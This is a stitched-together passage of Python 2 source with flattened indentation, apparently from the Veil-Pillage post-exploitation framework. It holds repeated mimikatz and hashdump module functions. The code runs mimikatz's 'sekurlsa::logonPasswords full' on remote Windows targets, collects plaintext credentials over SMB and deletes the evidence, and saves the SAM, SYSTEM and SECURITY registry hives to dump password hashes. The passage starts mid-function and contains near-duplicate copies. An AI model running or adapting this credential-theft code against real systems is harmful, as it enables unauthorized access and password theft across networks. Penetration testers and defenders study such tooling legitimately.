# save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
saveLocation = helpers.saveModuleFile(self, target,
"hashes.txt", hashes)
self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"
else:
self.output += "[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n"
if allHashes != "":
# get all non-empty hashes, uniquify and sort them
allHashes = [p.lower() for p in allHashes.split("\n") if p != '']
allHashes = sorted(set(allHashes))
self.output += "[*] All unique hashes:\n" + "\n".join(
allHashes) + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
lhost = self.required_options["lhost"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# the temporary output file gpp-password will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# let's keep track of ALL plaintext credentials found
allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []
for target in self.targets:
print "\n [*] Executing mimikatz on " + target
# first, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(target, username,
password, archCommand,
triggerMethod)
# if there's a failure in this initial execution, go to the next target
if "error" in archResult:
self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n"
continue
arch = "x86"
if "64" in archResult: arch = "x64"
exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
# now time for mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
# host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
delivery_methods.hostTrigger(target,
username,
password,
mimikatzPath,
lhost,
triggerMethod=triggerMethod,
exeArgs=exeArgs)
print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
out)
if out != "":
self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
# append the total mimikatz creds if we have any
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(
allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(
allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
lhost = self.required_options["lhost"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# the temporary output file gpp-password will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# let's keep track of ALL plaintext credentials found
allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []
for target in self.targets:
print "\n [*] Executing mimikatz on "+target
# first, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod)
# if there's a failure in this initial execution, go to the next target
if "error" in archResult:
self.output += "[!] Mimikatz failed for "+target+" : "+archResult+"\n"
continue
arch = "x86"
if "64" in archResult: arch = "x64"
exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
# now time for mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz"+arch+".exe"
# host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs)
print "\n [*] Waiting "+delay+"s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
if out != "":
self.output += "[*] Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
# append the total mimikatz creds if we have any
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# let's keep track of ALL hashes found
allHashes = ""
# reg.exe command to save off the hives
regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
for target in self.targets:
print helpers.color("\n [*] Dumping hashes on " + target)
# execute the registry save command
command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod)
# sleep for 5 seconds to let everything backup
time.sleep(5)
# grab all of the backed up files
systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)
error = False
if systemFile == "":
self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
error = True
else:
f = open("/tmp/system", "w")
f.write(systemFile)
f.close()
if securityFile == "":
self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open("/tmp/security", "w")
f.write(securityFile)
f.close()
if samFile == "":
self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
error = True
else:
f = open("/tmp/sam", "w")
f.write(samFile)
f.close()
if not error:
# get all the hashes from these hives
hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
# add the hashes to our global list
allHashes += hashes
# save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes)
self.output += (
"[*] dumped hashes (reg.exe) using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " saved to "
+ saveLocation
+ "\n"
)
else:
self.output += (
"[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n"
)
if allHashes != "":
# get all non-empty hashes, uniquify and sort them
allHashes = [p.lower() for p in allHashes.split("\n") if p != ""]
allHashes = sorted(set(allHashes))
self.output += "[*] All unique hashes:\n" + "\n".join(allHashes) + "\n"